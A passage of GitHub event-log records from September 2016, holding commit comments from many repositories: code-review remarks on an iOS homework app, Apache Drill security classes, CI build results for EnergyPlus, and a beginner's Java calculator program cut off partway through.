{"id":"4523435968","type":"CommitCommentEvent","actor":{"login":"hamzaze"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917228,"position":null,"line":null,"path":null,"commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:41:28Z","updated_at":"2016-09-06T19:41:28Z","body":"ok, i da izaberem Show (Push)?\n\nOn Tue, Sep 6, 2016 at 9:40 PM, irfanG <notifications@github.com> wrote:\n\n> nema potrebe da imas 2 navigation controllera - dovoljno je da sa \"+\"\n> prevuces segue na expenseViewController\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hamzaze/ios-journey/commit/c76de937fbcd14d0ebce43a778f51d742b71d5be#commitcomment-18917200>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATHqxHSkgqX8ekvJJWGIuwKaUdGs0oULks5qncGRgaJpZM4J2NG1>\n> .\n>\n"}},"created_at":"2016-09-06T19:41:28Z"}
{"id":"4523437222","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917230,"position":47,"line":47,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:41:43Z","updated_at":"2016-09-06T19:41:43Z","body":"同上。"}},"created_at":"2016-09-06T19:41:43Z"}
{"id":"4523442016","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917236,"position":null,"line":null,"path":null,"commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:42:40Z","updated_at":"2016-09-06T19:42:40Z","body":"da push je ok\r\n"}},"created_at":"2016-09-06T19:42:40Z"}
{"id":"4523442870","type":"CommitCommentEvent","actor":{"login":"chunhui-shi"},"repo":{"name":"sudheeshkatkam/drill"},"payload":{"comment":{"id":18917241,"position":37,"line":37,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/rpc/security/plain/PlainServer.java","commit_id":"1a8dece79965b8c0af27e6c62ac1af48b00203ab","created_at":"2016-09-06T19:42:50Z","updated_at":"2016-09-06T19:42:50Z","body":"Is there any reason we have to implement our own PlainServer? What about hadoop's SaslPlainServer?"}},"created_at":"2016-09-06T19:42:50Z"}
{"id":"4523445024","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917250,"position":16,"line":16,"path":"0309_2_Homework7_SpendingTracker/SpendingTracker/SpendingTracker/SpentTableViewController.swift","commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:43:16Z","updated_at":"2016-09-06T19:43:16Z","body":"pobrisi ovo sto ne koristis"}},"created_at":"2016-09-06T19:43:16Z"}
{"id":"4523449218","type":"CommitCommentEvent","actor":{"login":"Rolinh"},"repo":{"name":"t6/bucklespring"},"payload":{"comment":{"id":18917266,"position":null,"line":null,"path":null,"commit_id":"1f135a31dcd12280655d271cea281b047a5cd107","created_at":"2016-09-06T19:44:09Z","updated_at":"2016-09-06T19:44:09Z","body":"Yep, I can confirm that it works at least on DragonFly :wink: ."}},"created_at":"2016-09-06T19:44:09Z"}
{"id":"4523450166","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18917267,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T19:44:20Z","updated_at":"2016-09-06T19:44:20Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1184 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-06T19:44:20Z"}
{"id":"4523451550","type":"CommitCommentEvent","actor":{"login":"AntoniaCarlotta"},"repo":{"name":"AntoniaCarlotta/MyFirstRepository"},"payload":{"comment":{"id":18917277,"position":null,"line":null,"path":null,"commit_id":"06519ba92afb386755113f7b23cc0090e5ea7f28","created_at":"2016-09-06T19:44:37Z","updated_at":"2016-09-06T19:44:37Z","body":"Here's more information about this branch"}},"created_at":"2016-09-06T19:44:37Z"}
{"id":"4523451741","type":"CommitCommentEvent","actor":{"login":"doom369"},"repo":{"name":"blynkkk/blynk-library"},"payload":{"comment":{"id":18917278,"position":20,"line":54,"path":"examples/Widgets/Menu/Menu.ino","commit_id":"9059776a0fa1a23c1df786af4093b6561498e41a","created_at":"2016-09-06T19:44:39Z","updated_at":"2016-09-06T19:44:39Z","body":"It is better to create separate example"}},"created_at":"2016-09-06T19:44:39Z"}
{"id":"4523452100","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917280,"position":119,"line":119,"path":"0309_2_Homework7_SpendingTracker/0309_2_Homework7_SpendingTracker/ExpenseViewController.swift","commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:44:43Z","updated_at":"2016-09-06T19:44:43Z","body":"nije expenseName vec `expenseAmount`"}},"created_at":"2016-09-06T19:44:43Z"}
{"id":"4523454368","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18917293,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T19:45:11Z","updated_at":"2016-09-06T19:45:11Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T19:45:11Z"}
{"id":"4523454974","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18917295,"position":null,"line":null,"path":null,"commit_id":"e57a7e7bafdcd74e7962b59f5ac2e889e05787e5","created_at":"2016-09-06T19:45:18Z","updated_at":"2016-09-06T19:45:18Z","body":"oh lmao"}},"created_at":"2016-09-06T19:45:18Z"}
{"id":"4523456345","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917296,"position":119,"line":119,"path":"0309_2_Homework7_SpendingTracker/0309_2_Homework7_SpendingTracker/ExpenseViewController.swift","commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:45:33Z","updated_at":"2016-09-06T19:45:33Z","body":"dodaj guard za `expenseAmount`, ili ga napravi da nije opciono"}},"created_at":"2016-09-06T19:45:33Z"}
{"id":"4523458302","type":"CommitCommentEvent","actor":{"login":"huerlisi"},"repo":{"name":"panter/mykonote-app"},"payload":{"comment":{"id":18917299,"position":6,"line":6,"path":"config.xml","commit_id":"f23f232af379cc55901ef49e99a44867b6f2b8bd","created_at":"2016-09-06T19:45:56Z","updated_at":"2016-09-06T19:45:56Z","body":"We should always use 'https' when pointing to our website. Because we know we should;-)"}},"created_at":"2016-09-06T19:45:56Z"}
{"id":"4523459898","type":"CommitCommentEvent","actor":{"login":"vshymanskyy"},"repo":{"name":"blynkkk/blynk-library"},"payload":{"comment":{"id":18917303,"position":20,"line":54,"path":"examples/Widgets/Menu/Menu.ino","commit_id":"9059776a0fa1a23c1df786af4093b6561498e41a","created_at":"2016-09-06T19:46:16Z","updated_at":"2016-09-06T19:46:16Z","body":"Why do you think so?\r\nis it too complicated..?"}},"created_at":"2016-09-06T19:46:16Z"}
{"id":"4523461494","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18917306,"position":3,"line":185,"path":"cmd/micro/view.go","commit_id":"966dac97f84b36351db20cc2fd40a6f2c34f6a5f","created_at":"2016-09-06T19:46:34Z","updated_at":"2016-09-06T19:46:34Z","body":"Leftover comment"}},"created_at":"2016-09-06T19:46:34Z"}
{"id":"4523464746","type":"CommitCommentEvent","actor":{"login":"Gymnasiast"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18917313,"position":null,"line":null,"path":null,"commit_id":"d6a3b1e09352c7fb5101195d26701725f24b7c55","created_at":"2016-09-06T19:47:14Z","updated_at":"2016-09-06T19:47:14Z","body":"All the walls are missing from every SV4 file. That includes simple ones, not just parks that push RCT1's limits."}},"created_at":"2016-09-06T19:47:14Z"}
{"id":"4523466488","type":"CommitCommentEvent","actor":{"login":"chunhui-shi"},"repo":{"name":"sudheeshkatkam/drill"},"payload":{"comment":{"id":18917325,"position":19,"line":56,"path":"protocol/src/main/java/org/apache/drill/exec/proto/UserProtos.java","commit_id":"1a8dece79965b8c0af27e6c62ac1af48b00203ab","created_at":"2016-09-06T19:47:33Z","updated_at":"2016-09-06T19:47:33Z","body":"What is the reason we inject SASL_MESSAGE here and we have to update all definitions below?"}},"created_at":"2016-09-06T19:47:33Z"}
{"id":"4523469295","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917339,"position":15,"line":15,"path":"0309_2_Homework7_SpendingTracker/0309_2_Homework7_SpendingTracker/ExpenseTableViewController.swift","commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:48:05Z","updated_at":"2016-09-06T19:48:05Z","body":"imena varijabli pocinju malim slovom, obicno"}},"created_at":"2016-09-06T19:48:05Z"}
{"id":"4523471184","type":"CommitCommentEvent","actor":{"login":"huerlisi"},"repo":{"name":"panter/mykonote-app"},"payload":{"comment":{"id":18917343,"position":null,"line":null,"path":null,"commit_id":"76b2ca9bf9377bfa748973a2cf32ad1c2c46ca11","created_at":"2016-09-06T19:48:27Z","updated_at":"2016-09-06T19:48:27Z","body":"Would be nice to have those embedded in the app. It's a pity if they need to be loaded over the network.\r\n\r\nTake a look, at Ananas where we've built the CSS for the Material Icons."}},"created_at":"2016-09-06T19:48:27Z"}
{"id":"4523473835","type":"CommitCommentEvent","actor":{"login":"anthonykoerber"},"repo":{"name":"anthonykoerber/strand"},"payload":{"comment":{"id":18917349,"position":16,"line":20,"path":"src/strand-grid-column/strand-grid-column.scss","commit_id":"4b1e02d6078a05f6e4a93a71af8cefd64da5dd2a","created_at":"2016-09-06T19:48:57Z","updated_at":"2016-09-06T19:48:57Z","body":"oh yeah - not intentionally :) "}},"created_at":"2016-09-06T19:48:57Z"}
{"id":"4523474389","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18917354,"position":8,"line":188,"path":"cmd/micro/view.go","commit_id":"966dac97f84b36351db20cc2fd40a6f2c34f6a5f","created_at":"2016-09-06T19:49:03Z","updated_at":"2016-09-06T19:49:03Z","body":"Nice. I planned to do this myself, but couldn;t get around to it. If file name is long, there could be a problem.. "}},"created_at":"2016-09-06T19:49:03Z"}
{"id":"4523475803","type":"CommitCommentEvent","actor":{"login":"HridayHS"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18917366,"position":null,"line":null,"path":null,"commit_id":"f3409397b0215e67e015165ae5cd8dae03c5bece","created_at":"2016-09-06T19:49:19Z","updated_at":"2016-09-06T19:49:19Z","body":"Yes, leaving pure CAF for now, moving back again to aosp. I am tired now, I will update this manifest and other repos later on."}},"created_at":"2016-09-06T19:49:19Z"}
{"id":"4523476344","type":"CommitCommentEvent","actor":{"login":"7imbrook"},"repo":{"name":"harlanhaskins/trill"},"payload":{"comment":{"id":18917370,"position":28,"line":28,"path":"Sources/Runtime/MangledOperators.def","commit_id":"98050ab959bc7dddbf66a07e87fd2e99b4572a4d","created_at":"2016-09-06T19:49:24Z","updated_at":"2016-09-06T19:49:24Z","body":"@harlanhaskins curious why the mangled versions can't just be the operator as a string? Are you just trying to limit the character size? "}},"created_at":"2016-09-06T19:49:24Z"}
{"id":"4523477695","type":"CommitCommentEvent","actor":{"login":"Judahmeek"},"repo":{"name":"shakacode/react_on_rails"},"payload":{"comment":{"id":18917376,"position":112,"line":59,"path":"docs/tutorial.md","commit_id":"4cc17e6963e26f564404448fb2f2c922ab6072e7","created_at":"2016-09-06T19:49:39Z","updated_at":"2016-09-06T19:49:39Z","body":"This sounds like a weird issue. @dzirtusss, can you provide more detail about this?"}},"created_at":"2016-09-06T19:49:39Z"}
{"id":"4523484409","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18917410,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-06T19:50:53Z","updated_at":"2016-09-06T19:50:53Z","body":"And actually how to connect to the quad because downloaded nrf connect and android 5.1"}},"created_at":"2016-09-06T19:50:53Z"}
{"id":"4523484532","type":"CommitCommentEvent","actor":{"login":"c0ma"},"repo":{"name":"c0ma/CTF-challenges"},"payload":{"comment":{"id":18917412,"position":null,"line":null,"path":null,"commit_id":"ce748d8750056530557f3bea36da7b8fcd3c3640","created_at":"2016-09-06T19:50:54Z","updated_at":"2016-09-06T19:50:54Z","body":"Easy web challenges for CTF. "}},"created_at":"2016-09-06T19:50:54Z"}
{"id":"4523485336","type":"CommitCommentEvent","actor":{"login":"harlanhaskins"},"repo":{"name":"harlanhaskins/trill"},"payload":{"comment":{"id":18917414,"position":28,"line":28,"path":"Sources/Runtime/MangledOperators.def","commit_id":"98050ab959bc7dddbf66a07e87fd2e99b4572a4d","created_at":"2016-09-06T19:51:04Z","updated_at":"2016-09-06T19:51:04Z","body":"Generally, when mangling names, you want to keep them to valid C identifiers. Technically, there's nothing stopping me from using the operator itself, but then I wouldn't be able to call into Trill from, say, C."}},"created_at":"2016-09-06T19:51:04Z"}
{"id":"4523491272","type":"CommitCommentEvent","actor":{"login":"rubenscholfield"},"repo":{"name":"Futuretecnologies/Workstation"},"payload":{"comment":{"id":18917437,"position":null,"line":null,"path":null,"commit_id":"6c2f8613992f22daadd7afe7cd3de1e57fffe6b6","created_at":"2016-09-06T19:52:12Z","updated_at":"2016-09-06T19:52:12Z","body":"build up contributions and do requests and commerge etc."}},"created_at":"2016-09-06T19:52:12Z"}
{"id":"4523492374","type":"CommitCommentEvent","actor":{"login":"c0ma"},"repo":{"name":"c0ma/CTF-challenges"},"payload":{"comment":{"id":18917440,"position":1,"line":1,"path":"README.md","commit_id":"ce748d8750056530557f3bea36da7b8fcd3c3640","created_at":"2016-09-06T19:52:24Z","updated_at":"2016-09-06T19:52:24Z","body":"Easy web challenges for CTF. "}},"created_at":"2016-09-06T19:52:24Z"}
{"id":"4523495397","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18917462,"position":null,"line":null,"path":null,"commit_id":"ede85297cab8a691ac45f2c6342a8e0c165a43d8","created_at":"2016-09-06T19:53:00Z","updated_at":"2016-09-06T19:53:00Z","body":"++"}},"created_at":"2016-09-06T19:53:00Z"}
{"id":"4523497829","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":18917469,"position":null,"line":null,"path":null,"commit_id":"56d2889fba209d230dd0f4ebd57018d30fa3f35e","created_at":"2016-09-06T19:53:30Z","updated_at":"2016-09-06T19:53:30Z","body":"++"}},"created_at":"2016-09-06T19:53:30Z"}
{"id":"4523504103","type":"CommitCommentEvent","actor":{"login":"berolinux"},"repo":{"name":"OpenMandrivaAssociation/libgcrypt"},"payload":{"comment":{"id":18917477,"position":null,"line":null,"path":null,"commit_id":"de740aa387a383e803a7040a2508ab63a72900df","created_at":"2016-09-06T19:54:39Z","updated_at":"2016-09-06T19:54:39Z","body":"Funny, works in cooker...\r\nhttps://abf.openmandriva.org/build_lists/77789\r\n\r\nMaybe it requires clang 3.9 + the fix (-fno-lto is required in the test because with -flto, the code generated is bytecode and not ASM --> building it with \"as\" fails), will take a look when I have another 3.0 box up"}},"created_at":"2016-09-06T19:54:39Z"}
{"id":"4523505475","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"apple/swift-llvm"},"payload":{"comment":{"id":18917480,"position":5,"line":69,"path":"utils/lit/lit/run.py","commit_id":"46c90ef22b18a32ad914cf1a4b71dc54595d44e5","created_at":"2016-09-06T19:54:54Z","updated_at":"2016-09-06T19:54:54Z","body":"I think the implementation in this file is more invasive than necessary.\r\n\r\nWhat I would do instead:\r\n\r\n1. Create a little wrapper object for a per-run result processor, and pass it the display and the config.\r\n\r\n2. Change the consumer classes to take a wrapper of that type rather than the `display` directly.\r\n\r\n3. Update that object to maintain the failure count and check `maxFailures`, and cancel the provider if necessary.\r\n"}},"created_at":"2016-09-06T19:54:54Z"}
{"id":"4523507734","type":"CommitCommentEvent","actor":{"login":"NicoHinderling"},"repo":{"name":"smwoods/RallyApp"},"payload":{"comment":{"id":18917485,"position":null,"line":null,"path":null,"commit_id":"0417e2811b1c57af7180e808ce1611640a65cb9b","created_at":"2016-09-06T19:55:20Z","updated_at":"2016-09-06T19:55:20Z","body":"dope"}},"created_at":"2016-09-06T19:55:20Z"}
{"id":"4523512742","type":"CommitCommentEvent","actor":{"login":"doom369"},"repo":{"name":"blynkkk/blynk-library"},"payload":{"comment":{"id":18917497,"position":20,"line":54,"path":"examples/Widgets/Menu/Menu.ino","commit_id":"9059776a0fa1a23c1df786af4093b6561498e41a","created_at":"2016-09-06T19:56:15Z","updated_at":"2016-09-06T19:56:15Z","body":"I would call it feature segregation."}},"created_at":"2016-09-06T19:56:15Z"}
{"id":"4523513939","type":"CommitCommentEvent","actor":{"login":"StephenCleary"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18917500,"position":null,"line":null,"path":null,"commit_id":"cbde1516f0ed42360dd40f8feb99afee0a7b2f69","created_at":"2016-09-06T19:56:30Z","updated_at":"2016-09-06T19:56:30Z","body":"Heh. The json patch was the one scenario where it *wasn't* checking the version before. :)\r\n"}},"created_at":"2016-09-06T19:56:30Z"}
{"id":"4523514333","type":"CommitCommentEvent","actor":{"login":"onmyway133"},"repo":{"name":"iOS-Goodies/iOS-Goodies"},"payload":{"comment":{"id":18917503,"position":null,"line":null,"path":null,"commit_id":"83fcc21f0e2df030a7a607a0662fd5af0b5d3e6e","created_at":"2016-09-06T19:56:33Z","updated_at":"2016-09-06T19:56:33Z","body":"@dkhamsing thanks 😅 "}},"created_at":"2016-09-06T19:56:33Z"}
{"id":"4523521808","type":"CommitCommentEvent","actor":{"login":"fvanderbiest"},"repo":{"name":"georchestra/georchestra"},"payload":{"comment":{"id":18917539,"position":null,"line":null,"path":null,"commit_id":"c3b4b87f6b7a314792da20cb61e38136cfe5ee16","created_at":"2016-09-06T19:57:57Z","updated_at":"2016-09-06T19:57:57Z","body":"tested ATM, it works ..."}},"created_at":"2016-09-06T19:57:57Z"}
{"id":"4523523262","type":"CommitCommentEvent","actor":{"login":"wurstbrot"},"repo":{"name":"wurstbrot/juice-shop"},"payload":{"comment":{"id":18917544,"position":null,"line":null,"path":null,"commit_id":"41b50a4da804f985ca081a0a34e52c9ed4145ace","created_at":"2016-09-06T19:58:13Z","updated_at":"2016-09-06T19:58:13Z","body":"Add Conference \"Kieler Open Source und Linux Tage\""}},"created_at":"2016-09-06T19:58:13Z"}
{"id":"4523525521","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18917551,"position":null,"line":null,"path":null,"commit_id":"1ba88ad2821ca25d21f5a2fc4032c014793c7398","created_at":"2016-09-06T19:58:36Z","updated_at":"2016-09-06T19:58:36Z","body":"++"}},"created_at":"2016-09-06T19:58:36Z"}
{"id":"4523530684","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18917568,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-06T19:59:34Z","updated_at":"2016-09-06T19:59:34Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - x86_64-MacOS-10.9-clang: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-06T19:59:34Z"}
{"id":"4523531818","type":"CommitCommentEvent","actor":{"login":"dzirtusss"},"repo":{"name":"shakacode/react_on_rails"},"payload":{"comment":{"id":18917573,"position":112,"line":59,"path":"docs/tutorial.md","commit_id":"4cc17e6963e26f564404448fb2f2c922ab6072e7","created_at":"2016-09-06T19:59:46Z","updated_at":"2016-09-06T19:59:46Z","body":"Its officially from [ror gem readme](https://github.com/shakacode/react_on_rails/blob/master/README.md#getting-started) and it really worked like this. As I understand it is needed."}},"created_at":"2016-09-06T19:59:46Z"}
{"id":"4518855211","type":"CommitCommentEvent","actor":{"login":"jayachandrabalusu"},"repo":{"name":"jayachandrabalusu/Social-Media-Analytics-using-Twitter-data"},"payload":{"comment":{"id":18904788,"position":null,"line":null,"path":null,"commit_id":"38e4679f7be3c5059b94534100c3f7b5300a4992","created_at":"2016-09-06T02:00:10Z","updated_at":"2016-09-06T02:00:10Z","body":"Performed social media analytics to analyze various user segment sentiments about 2016 US presidential elections. Performed Natural Language Processing (NLP) in R to analyze unstructured data from twitter"}},"created_at":"2016-09-06T02:00:10Z"}
{"id":"4518856956","type":"CommitCommentEvent","actor":{"login":"bthurm07"},"repo":{"name":"bthurm07/hello-world"},"payload":{"comment":{"id":18904795,"position":null,"line":null,"path":null,"commit_id":"0924b9f585071f6eb8691ae209d54b9f13eea0be","created_at":"2016-09-06T02:00:49Z","updated_at":"2016-09-06T02:00:49Z","body":"Hello World program written in C++"}},"created_at":"2016-09-06T02:00:49Z"}
{"id":"4518863475","type":"CommitCommentEvent","actor":{"login":"double-vane"},"repo":{"name":"wanglimin/dense_flow"},"payload":{"comment":{"id":18904820,"position":null,"line":null,"path":null,"commit_id":"a25f28a5bb14199b5c158ceb4d3a7b737ee0aade","created_at":"2016-09-06T02:03:46Z","updated_at":"2016-09-06T02:03:46Z","body":"你好，请问这个是什么？\r\npath1 = '/nfs_c06/Datasets/ActivityNet/anet_clips_v1.3/';\r\n path2 = '/nfs_c06/Datasets/ActivityNet/anet_clips_v1.3_flow_img_fvl1_gpu_size_256/';\r\n path3 = '/nfs_c06/Datasets/ActivityNet/anet_clips_v1.3_rgb_img_new_size_256/';"}},"created_at":"2016-09-06T02:03:46Z"}
{"id":"4518865022","type":"CommitCommentEvent","actor":{"login":"jcalabrese"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18904826,"position":13,"line":13,"path":"md/app.md","commit_id":"6bbc0b468dae6afc31f9d19631e26dd5cf8ffb6e","created_at":"2016-09-06T02:04:31Z","updated_at":"2016-09-06T02:04:31Z","body":"`log` needs to be declared "}},"created_at":"2016-09-06T02:04:31Z"}
{"id":"4518867174","type":"CommitCommentEvent","actor":{"login":"Andrewgomez123"},"repo":{"name":"Andrewgomez123/Blog-bueno"},"payload":{"comment":{"id":18904835,"position":null,"line":null,"path":null,"commit_id":"cf878bb187567e6d8fd46e492107f0fe386dbedf","created_at":"2016-09-06T02:05:28Z","updated_at":"2016-09-06T02:05:28Z","body":"gigi"}},"created_at":"2016-09-06T02:05:28Z"}
{"id":"4518868550","type":"CommitCommentEvent","actor":{"login":"Andrewgomez123"},"repo":{"name":"Andrewgomez123/Blog-bueno"},"payload":{"comment":{"id":18904840,"position":5,"line":8,"path":"index.html","commit_id":"cf878bb187567e6d8fd46e492107f0fe386dbedf","created_at":"2016-09-06T02:06:07Z","updated_at":"2016-09-06T02:06:07Z","body":"Nueva imagen"}},"created_at":"2016-09-06T02:06:07Z"}
{"id":"4518869069","type":"CommitCommentEvent","actor":{"login":"bkazemi"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18904843,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T02:06:20Z","updated_at":"2016-09-06T02:06:20Z","body":"Usually printing works okay as long as the locale is set properly and it's in a multi-byte format. However, issues pop up when you want to analyze the string in some way with the standard string functions (for example, `strlen()` will not work properly). For this reason, it is probably a bad idea to be storing Unicode strings in char pointers..."}},"created_at":"2016-09-06T02:06:20Z"}
{"id":"4518869503","type":"CommitCommentEvent","actor":{"login":"Andrewgomez123"},"repo":{"name":"Andrewgomez123/Blog-bueno"},"payload":{"comment":{"id":18904845,"position":null,"line":null,"path":null,"commit_id":"cf878bb187567e6d8fd46e492107f0fe386dbedf","created_at":"2016-09-06T02:06:32Z","updated_at":"2016-09-06T02:06:32Z","body":"correccion de imagen"}},"created_at":"2016-09-06T02:06:32Z"}
{"id":"4518870725","type":"CommitCommentEvent","actor":{"login":"Andrewgomez123"},"repo":{"name":"Andrewgomez123/Blog-bueno"},"payload":{"comment":{"id":18904851,"position":5,"line":8,"path":"index.html","commit_id":"cf878bb187567e6d8fd46e492107f0fe386dbedf","created_at":"2016-09-06T02:07:05Z","updated_at":"2016-09-06T02:07:05Z","body":"correccion"}},"created_at":"2016-09-06T02:07:05Z"}
{"id":"4518871056","type":"CommitCommentEvent","actor":{"login":"Andrewgomez123"},"repo":{"name":"Andrewgomez123/Blog-bueno"},"payload":{"comment":{"id":18904852,"position":null,"line":null,"path":null,"commit_id":"cf878bb187567e6d8fd46e492107f0fe386dbedf","created_at":"2016-09-06T02:07:13Z","updated_at":"2016-09-06T02:07:13Z","body":"ya"}},"created_at":"2016-09-06T02:07:13Z"}
{"id":"4518872821","type":"CommitCommentEvent","actor":{"login":"midascom26"},"repo":{"name":"midascom26/arquitecturapc"},"payload":{"comment":{"id":18904856,"position":null,"line":null,"path":null,"commit_id":"185454de308b4acdd7218f3b1bb883feea23d388","created_at":"2016-09-06T02:08:04Z","updated_at":"2016-09-06T02:08:04Z","body":"Trabajo realizado por Miguel Martinez"}},"created_at":"2016-09-06T02:08:04Z"}
{"id":"4518874949","type":"CommitCommentEvent","actor":{"login":"Anchundia11112"},"repo":{"name":"Anchundia11112/PracBasic"},"payload":{"comment":{"id":18904864,"position":null,"line":null,"path":null,"commit_id":"1db4ddd9512580aebfafc2198297963b05f14c32","created_at":"2016-09-06T02:09:05Z","updated_at":"2016-09-06T02:09:05Z","body":"import java.util.Scanner ;\r\nimport static java.lang.Math.pow;\r\n\r\n// Choice 1 will decide what number are used.\r\n// Choice 2 will be the operations.\r\n// Choice 3 will be for selecting which number will come first in subtracting and devision.\r\n// \r\n \r\npublic class Operations{\r\n    public static void main (String[] args){\r\n        double a, b , c, Subtract_Choice, result;\r\n        int choice1,choice2, choice3,choice4  ;  \r\n        System.out.print (\"Please enter a number for the A variable\");\r\n        Scanner letterA = new Scanner(System.in);\r\n        a = letterA.nextInt();\r\n        \r\n        System.out.println (\"Letter A is now equal to\" +\" \" + a);\r\n        \r\n        System.out.println (\"Now would you please enter a number for the B\");\r\n        Scanner letterB = new Scanner(System.in);\r\n        b = letterB.nextInt();\r\n        \r\n        System.out.println (\"Letter B will now be equal to\" + \" \" + b);\r\n        \r\n        System.out.println (\"Finally, plase enter the number you wish C to be equal to\");\r\n        Scanner letterC = new Scanner(System.in);\r\n        c = letterC.nextInt();\r\n        \r\n        System.out.print (\"Please select which, or all, of the letters you would like to use as your numbers and what operation you would like to perform.\");\r\n        Scanner theChoice = new Scanner(System.in);\r\n        choice1 = theChoice.nextInt();\r\n        \r\n        System.out.println (\"Select what operation you would like to perform.\");\r\n        Scanner otherChoice = new Scanner(System.in);\r\n        choice2 = otherChoice.nextInt();\r\n        \r\n        \r\n        //A+B,B+A\r\n        if (choice1 == 1 && choice2 == 1){\r\n            System.out.println (\" You have selected A and B as your numbers plus addition as your operation\"); 